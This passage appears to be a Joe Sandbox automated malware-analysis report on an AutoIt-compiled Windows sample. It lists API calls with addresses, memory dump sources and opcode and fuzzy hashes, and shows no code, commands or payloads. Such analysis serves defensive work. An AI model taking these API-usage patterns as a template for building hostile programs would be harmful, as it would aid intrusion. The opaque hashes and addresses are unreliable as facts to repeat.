                        • Instruction ID: 1e14141e35c353131c87f7ee00333b0ffb3ef425a40f1e48751b672d4583e496
                        • Opcode Fuzzy Hash: d6acae019a3340cd75dd6769bd02aab0e1291a39984b301b319b2415d4d2f961
                        • Instruction Fuzzy Hash: 01F05538845B20ABD73337108C08E69B31CAF00701F5A95D9F80BE20C4CB70DD408782
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E9C
                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00334EAE
                        • FreeLibrary.KERNEL32(00000000,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EC0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                        • API String ID: 145871493-3689287502
                        • Opcode ID: 9530a494dd06db302388d4db297f4f2c9dfa072993239416aefb4e1241afeb3b
                        • Instruction ID: f1e1ab08cea6cf18bc1318c59ea0a06f77c1559a543eb241ccc7b4da194c8678
                        • Opcode Fuzzy Hash: 9530a494dd06db302388d4db297f4f2c9dfa072993239416aefb4e1241afeb3b
                        • Instruction Fuzzy Hash: 8DE0CD35E125225BD23317266C18F6FA55CAFC1F62F0A0115FD09D2210DB60ED0242A0
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E62
                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00334E74
                        • FreeLibrary.KERNEL32(00000000,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E87
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                        • API String ID: 145871493-1355242751
                        • Opcode ID: a80fbf3c80e5c8c445e28e10fd4edfd8fc83d4298ee56ce2030e8d42db0f48a6
                        • Instruction ID: bdcf479038da21fac66f2d4b2ac29d7d3b3e368edfec3395e219c6b12f0ad368
                        • Opcode Fuzzy Hash: a80fbf3c80e5c8c445e28e10fd4edfd8fc83d4298ee56ce2030e8d42db0f48a6
                        • Instruction Fuzzy Hash: 87D05B369126315756331B66BC1CEDF6A1CAF85F52B0A1515F90DE2114CF60ED02C7D0
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 003BA427
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003BA435
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003BA468
                        • CloseHandle.KERNEL32(?), ref: 003BA63D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$CloseCountersCurrentHandleOpen
                        • String ID:
                        • API String ID: 3488606520-0
                        • Opcode ID: 061843cfc38672f311a67a32301b2cae17436c713527b691337b5a5cf1aed5ea
                        • Instruction ID: 958960a49654da01ba0cf19cd4ffe243457c0b4a181f2a23d8ccf5cf024afa7a
                        • Opcode Fuzzy Hash: 061843cfc38672f311a67a32301b2cae17436c713527b691337b5a5cf1aed5ea
                        • Instruction Fuzzy Hash: 53A1B175604700AFD721DF24C886F2AB7E5AF84714F14881DF69A9F792DB70EC418B92
                        APIs
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,003D3700), ref: 0036BB91
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0036BC09
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00401270,000000FF,?,0000003F,00000000,?), ref: 0036BC36
                        • _free.LIBCMT ref: 0036BB7F
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 0036BD4B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                        • String ID:
                        • API String ID: 1286116820-0
                        • Opcode ID: d63d2feb1da31bd470bae590e8b424b54cd276fa8d53352d583df0b25c74f9fd
                        • Instruction ID: 3c1fa9cb9c37e2ad0fc86afb405064e7a7cf991b02963623b79964e2eb46c018
                        • Opcode Fuzzy Hash: d63d2feb1da31bd470bae590e8b424b54cd276fa8d53352d583df0b25c74f9fd
                        • Instruction Fuzzy Hash: 15510A719002099FC712DF659D8196EF7BCEF41350F11826AE554EB2A9EB309E818F54
                        APIs
                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0039CF22,?), ref: 0039DDFD
                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0039CF22,?), ref: 0039DE16
                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                        • lstrcmpiW.KERNEL32(?,?), ref: 0039E473
                        • MoveFileW.KERNEL32(?,?), ref: 0039E4AC
                        • _wcslen.LIBCMT ref: 0039E5EB
                        • _wcslen.LIBCMT ref: 0039E603
                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0039E650
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                        • String ID:
                        • API String ID: 3183298772-0
                        • Opcode ID: 9bd0c7a7012ceca85a29947a048989919245c98de6f62dea7f4562a40b2884bb
                        • Instruction ID: 9d367ade4dc69f27ab2a31053f0fda3f56ce9cde9a2addb7b77e17940341b2ce
                        • Opcode Fuzzy Hash: 9bd0c7a7012ceca85a29947a048989919245c98de6f62dea7f4562a40b2884bb
                        • Instruction Fuzzy Hash: 525141B24083459BCB26DB94D881EDFB3ECAF85340F00491EF589D7191EF74A688C766
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BBAA5
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BBB00
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003BBB63
                        • RegCloseKey.ADVAPI32(?,?), ref: 003BBBA6
                        • RegCloseKey.ADVAPI32(00000000), ref: 003BBBB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                        • String ID:
                        • API String ID: 826366716-0
                        • Opcode ID: 02e1527146212cedc308f5c71103d0455dff48c72067d180d041f49c20bf889a
                        • Instruction ID: 639a6c44f798f4a7b9ba16b7f86c721847dc988a41d0f04f78a9cd09de1b61a7
                        • Opcode Fuzzy Hash: 02e1527146212cedc308f5c71103d0455dff48c72067d180d041f49c20bf889a
                        • Instruction Fuzzy Hash: 8F61AD31608201EFD316DF14C890E6ABBE9FF84308F14859DF5998B6A2CB71ED45CB92
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00398BCD
                        • VariantClear.OLEAUT32 ref: 00398C3E
                        • VariantClear.OLEAUT32 ref: 00398C9D
                        • VariantClear.OLEAUT32(?), ref: 00398D10
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00398D3B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType
                        • String ID:
                        • API String ID: 4136290138-0
                        • Opcode ID: e3f905b0edbd4ad283616ab84f4229394e750e9ba2b3628608b3598fbb298a4d
                        • Instruction ID: 3c793f7b76a88bbc1dcc37bfbf5bc16f507c36b18f0a364cd25c84b83973ea36
                        • Opcode Fuzzy Hash: e3f905b0edbd4ad283616ab84f4229394e750e9ba2b3628608b3598fbb298a4d
                        • Instruction Fuzzy Hash: 5D5145B5A00619EFCB15CF68C894AAAB7F8FF89314B158559E909DB350E730E911CF90
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003A8BAE
                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 003A8BDA
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003A8C32
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003A8C57
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003A8C5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String
                        • String ID:
                        • API String ID: 2832842796-0
                        • Opcode ID: c6c3a0509773fd1e1737de78ba044c21f2d44fecad926d0afd0d0f7ea0da0fb4
                        • Instruction ID: 06ddc51ca63aaa7d1a244079a263ef3db971b1cf23f2b551915469ba50e4e175
                        • Opcode Fuzzy Hash: c6c3a0509773fd1e1737de78ba044c21f2d44fecad926d0afd0d0f7ea0da0fb4
                        • Instruction Fuzzy Hash: 46513975A00218AFDB16DF65C880A69BBF5FF49314F088458E849AF362CB31ED51CF90
                        APIs
                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 003B8F40
                        • GetProcAddress.KERNEL32(00000000,?), ref: 003B8FD0
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 003B8FEC
                        • GetProcAddress.KERNEL32(00000000,?), ref: 003B9032
                        • FreeLibrary.KERNEL32(00000000), ref: 003B9052
                          • Part of subcall function 0034F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,003A1043,?,7644E610), ref: 0034F6E6
                          • Part of subcall function 0034F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0038FA64,00000000,00000000,?,?,003A1043,?,7644E610,?,0038FA64), ref: 0034F70D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                        • String ID:
                        • API String ID: 666041331-0
                        • Opcode ID: b95c5d202aab83a0615b58e6c046f85666f09aca4b7d57fb984e86d8fe8cff8b
                        • Instruction ID: 8d24ec9d328099b3fb8ceb2b4a67339d96734158abd58912dd914a3146f0ae6f
                        • Opcode Fuzzy Hash: b95c5d202aab83a0615b58e6c046f85666f09aca4b7d57fb984e86d8fe8cff8b
                        • Instruction Fuzzy Hash: 17513935604205DFCB12EF54C4849ADBBB5FF49318F098099EA0A9F762DB31ED86CB90
                        APIs
                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 003C6C33
                        • SetWindowLongW.USER32(?,000000EC,?), ref: 003C6C4A
                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 003C6C73
                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,003AAB79,00000000,00000000), ref: 003C6C98
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 003C6CC7
                        Similarity
                        • API ID: Window$Long$MessageSendShow
                        • String ID:
                        • API String ID: 3688381893-0
                        • Opcode ID: 8343328727032a7d39ccb5a91094fa81a56ac4b151bd09c48cc604c88e8e675d
                        • Instruction ID: c1cf39746cc460a2c5bbc83addf2407af8b1f4a11d8e3a3b00dca74bd7b253bc
                        • Opcode Fuzzy Hash: 8343328727032a7d39ccb5a91094fa81a56ac4b151bd09c48cc604c88e8e675d
                        • Instruction Fuzzy Hash: F441D535A04104AFD726CF28CD5AFA97BA9EB09350F16422CF899E72E1C771ED41CB40
                        APIs
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 3271823b89ac790d633a7020833bba8ff7b2b24a4ef7a6a358bb73500c9ac106
                        • Instruction ID: 0208b904a2b4c30c98fd4c8f48059fc68711eeb4312fa82ef1f96fbfa1c50f18
                        • Opcode Fuzzy Hash: 3271823b89ac790d633a7020833bba8ff7b2b24a4ef7a6a358bb73500c9ac106
                        • Instruction Fuzzy Hash: 3A41D032A006049FCB26DF78C980A6EB3E5EF89314F168568E915EF359DA31AD01CB80
                        APIs
                        • GetCursorPos.USER32(?), ref: 00349141
                        • ScreenToClient.USER32(00000000,?), ref: 0034915E
                        • GetAsyncKeyState.USER32(00000001), ref: 00349183
                        • GetAsyncKeyState.USER32(00000002), ref: 0034919D
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        • String ID:
                        • API String ID: 4210589936-0
                        • Opcode ID: 3806eac0f60b2f4424d89071eacc6eb72ee1e1358a216937e5f6a4ae3a001ee4
                        • Instruction ID: 135b0d91a3e15726c470ee0bfa678a4195f69533ae4d09773cd8ebce469a58de
                        • Opcode Fuzzy Hash: 3806eac0f60b2f4424d89071eacc6eb72ee1e1358a216937e5f6a4ae3a001ee4
                        • Instruction Fuzzy Hash: F341527190861AFBDF16AF64C848BEEB7B5FF05320F25825AE429A72D0C730AD54CB51
                        APIs
                        • GetInputState.USER32 ref: 003A38CB
                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 003A3922
                        • TranslateMessage.USER32(?), ref: 003A394B
                        • DispatchMessageW.USER32(?), ref: 003A3955
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A3966
                        Similarity
                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                        • String ID:
                        • API String ID: 2256411358-0
                        • Opcode ID: 391786c9a6143e68382f5e94e4b6c3959ab7f765cc4dfcf1a3691d4a1d23e0a4
                        • Instruction ID: 666a6293832412970d8499ed08e0462e9a94d6a868f9a31a2c7e325f00925737
                        • Opcode Fuzzy Hash: 391786c9a6143e68382f5e94e4b6c3959ab7f765cc4dfcf1a3691d4a1d23e0a4
                        • Instruction Fuzzy Hash: D831A0719083429FEB27CB759948FB737ACEB07304F05456DF466D25A0E3B4AA89CB11
                        APIs
                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 003ACF38
                        • InternetReadFile.WININET(?,00000000,?,?), ref: 003ACF6F
                        • GetLastError.KERNEL32(?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFB4
                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFC8
                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFF2
                        Similarity
                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                        • String ID:
                        • API String ID: 3191363074-0
                        • Opcode ID: 974bfd77014e7a337eb2199c804fe7cbb42651b33a7d578c8c7748ff8efc8b99
                        • Instruction ID: 5e23b4366e42983db05bd598aa1af3bc4662662d590d63b62fa4df687bc0e87d
                        • Opcode Fuzzy Hash: 974bfd77014e7a337eb2199c804fe7cbb42651b33a7d578c8c7748ff8efc8b99
                        • Instruction Fuzzy Hash: DB318E71914205EFDB22DFA5C884EABBBFDEB16310F10542EF50AD6501DB30AE41DB60
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00391915
                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 003919C1
                        • Sleep.KERNEL32(00000000,?,?,?), ref: 003919C9
                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 003919DA
                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003919E2
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        • Opcode ID: 0fe532a42445cca3cabe4278543c81d1830534ea5863eb2f52b3f38bb36059f7
                        • Instruction ID: 7e6f2beacb503c60fdb3e1b23c8f24ea926060246692ca022bec740be3998c4f
                        • Opcode Fuzzy Hash: 0fe532a42445cca3cabe4278543c81d1830534ea5863eb2f52b3f38bb36059f7
                        • Instruction Fuzzy Hash: B131AF71A0021AEFDF01CFA8C999ADE7BB5EB04315F114225F925E72D1C770A954CB90
                        APIs
                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003C5745
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 003C579D
                        • _wcslen.LIBCMT ref: 003C57AF
                        • _wcslen.LIBCMT ref: 003C57BA
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C5816
                        Similarity
                        • API ID: MessageSend$_wcslen
                        • String ID:
                        • API String ID: 763830540-0
                        • Opcode ID: 88c7723a35b43749bff5f3c593315dcd1ddd9541207202f2ab5b65692bfaa595
                        • Instruction ID: 59d6bf9400f5be7a87caa2ca9d4c68463209ff108cd01660f3178b66abdf4558
                        • Opcode Fuzzy Hash: 88c7723a35b43749bff5f3c593315dcd1ddd9541207202f2ab5b65692bfaa595
                        • Instruction Fuzzy Hash: A52185719046189ADB229F61CC85FEEB7BCFF04725F10825AE919EA190D770ADC5CF50
                        APIs
                        • IsWindow.USER32(00000000), ref: 003B0951
                        • GetForegroundWindow.USER32 ref: 003B0968
                        • GetDC.USER32(00000000), ref: 003B09A4
                        • GetPixel.GDI32(00000000,?,00000003), ref: 003B09B0
                        • ReleaseDC.USER32(00000000,00000003), ref: 003B09E8
                        Similarity
                        • API ID: Window$ForegroundPixelRelease
                        • String ID:
                        • API String ID: 4156661090-0
                        • Opcode ID: e05685d7c41ffe0a919fe64d40fd38850fc9764f7f6a694ef5a8f3b86a094904
                        • Instruction ID: 8b611ba720cb8ce722ed48e2b1b1f06dcee4bb072c2a6a9111b4aa8a433dd408
                        • Opcode Fuzzy Hash: e05685d7c41ffe0a919fe64d40fd38850fc9764f7f6a694ef5a8f3b86a094904
                        • Instruction Fuzzy Hash: 99218E35600204AFD705EF65C988EAFBBE9EF49740F048068E94AEB762CB30AC04CB50
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0036CDC6
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0036CDE9
                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0036CE0F
                        • _free.LIBCMT ref: 0036CE22
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036CE31
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: 71249b9dddd358495c433568f737b94ed666047f778feb4296c2c9b76168eb51
                        • Instruction ID: aadf0bf7788fe4f3815e882ca13eadcaa321cdba6d6de9d4b336b48f673c3b39
                        • Opcode Fuzzy Hash: 71249b9dddd358495c433568f737b94ed666047f778feb4296c2c9b76168eb51
                        • Instruction Fuzzy Hash: A501D872A212157F632316B66C48C7B7D7DDEC6BA23169129F905C7104DA668D0182B4
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
                        • SelectObject.GDI32(?,00000000), ref: 003496A2
                        • BeginPath.GDI32(?), ref: 003496B9
                        • SelectObject.GDI32(?,00000000), ref: 003496E2
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: a76eaa0d52031b4b60d46572c68463c7aafad5ee23c6dbcda195be58e5da2472
                        • Instruction ID: b51bd0366801e82ba304ff2594021399c26f55aa4e32aff79375f3b29b0571f7
                        • Opcode Fuzzy Hash: a76eaa0d52031b4b60d46572c68463c7aafad5ee23c6dbcda195be58e5da2472
                        • Instruction Fuzzy Hash: 742187B0812305EFDB129F65ED18BAA3BF9BB50365F160227F414BA1B0D374A851CF98
                        APIs
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: 1f8e02f0894decf80c229260fbd550aa6776128fb13327c8bf217085b2f98a0c
                        • Instruction ID: 7eda63687a5af1463584d41d524440321438e40f1007895826f09450900bc4c2
                        • Opcode Fuzzy Hash: 1f8e02f0894decf80c229260fbd550aa6776128fb13327c8bf217085b2f98a0c
                        • Instruction Fuzzy Hash: 2A01F1A6341A09BFEA0B6A50AD92FFB736D9B303A5F004024FD049E641F730EF5483A0
                        APIs
                        • GetLastError.KERNEL32(?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6), ref: 00362DFD
                        • _free.LIBCMT ref: 00362E32
                        • _free.LIBCMT ref: 00362E59
                        • SetLastError.KERNEL32(00000000,00331129), ref: 00362E66
                        • SetLastError.KERNEL32(00000000,00331129), ref: 00362E6F
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: 64ba284c79399a1fb61112d9f48d714a04da7ab973cf73cac78882551c23f36b
                        • Instruction ID: 0959f250a0796f3d74ac0564189e1748b99fbdb479aa166c45a9ee2857da9924
                        • Opcode Fuzzy Hash: 64ba284c79399a1fb61112d9f48d714a04da7ab973cf73cac78882551c23f36b
                        • Instruction Fuzzy Hash: 1401F436645E0067C61327346D49D2B265DABD23A1F27D438F425E62DAEB368C118220
                        APIs
                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?,?,0039035E), ref: 0039002B
                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390046
                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390054
                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?), ref: 00390064
                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390070
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        • Opcode ID: 922197dea8e4ec4164d39adc31493122c4c7017bd2b9b4a1351964d14a2e8bc9
                        • Instruction ID: d16f3209618d3e712bc5561f685a904693ce9b400f52a9d94cda65bfd5d2c2f0
                        • Opcode Fuzzy Hash: 922197dea8e4ec4164d39adc31493122c4c7017bd2b9b4a1351964d14a2e8bc9
                        • Instruction Fuzzy Hash: 53018B76610204BFDF169F68DC04FAE7AEDEB44792F145124F909D2210E775ED408BA0
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?), ref: 0039E997
                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0039E9A5
